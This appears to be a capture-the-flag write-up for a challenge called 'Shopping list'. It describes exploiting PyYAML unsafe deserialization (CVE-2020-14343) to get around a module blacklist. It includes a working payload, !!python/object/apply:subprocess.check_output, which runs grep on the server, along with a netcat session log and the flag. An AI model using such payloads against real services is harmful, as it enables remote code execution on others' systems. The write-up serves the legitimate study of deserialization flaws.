Skip to content

Latest commit

 

History

History

Shopping list

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 

Shopping list

Author: Stratulat Dragoș

Description

Exposing server errors on the client side and leak information about the library modules used by the server.

Requirements

  • PyYaml module CVE-2020-14343

Solve

Connection and Options

Connect to the server.
After entering a username, the server presents two options.
Opting for the first choice allows adding a new list in a JSON-like format.

Valid List Entry

Provide a correctly formatted list to observe the response.
Check the second option to verify if the list got stored.

Error Detection with PyYAML Module

Encounter an error indicating the server's usage of the PyYAML module.
This module has a known CVE that enables arbitrary code execution; the server implemented a blacklist mechanism though.

Discovery of Allowed Module

After several attempts, find that the subprocess module isn't blacklisted.
Attempt to execute ls to examine the output.
Discovered the cat command was blacklisted.

Successful Approach

Attempted using grep –r "CSCTF{} as the flag format.
Successfully retrieved the flag with the following payload:

{!!python/object/apply:subprocess.check_output [["grep", "-r", "CSCTF"]]}

nc chal.chronossec.site 30190
Enter your username: chronos
Hello, chronos

[+] Welcome to our super secure shopping list application.
[+] Press [1] to add a new list
[+] Press [2] to see your lists
1

Enter your list with the following format {[product name]: [quantity]}.
Example: {apples: 10, bananas: 5}
{!!python/object/apply:subprocess.check_output [["grep", "-r", "CSCTF"]]}

[+] Welcome to our super secure shopping list application.
[+] Press [1] to add a new list
[+] Press [2] to see your lists
2
[*] Here are your lists:
List 0
{b'flag.txt:CSCTF{y3T_@n0Th3R_Rc3_vUln3R@B1L17Y}\n': None}


[+] Welcome to our super secure shopping list application.
[+] Press [1] to add a new list
[+] Press [2] to see your lists

Flag: CSCTF{y3T_@n0Th3R_Rc3_vUln3R@B1L17Y}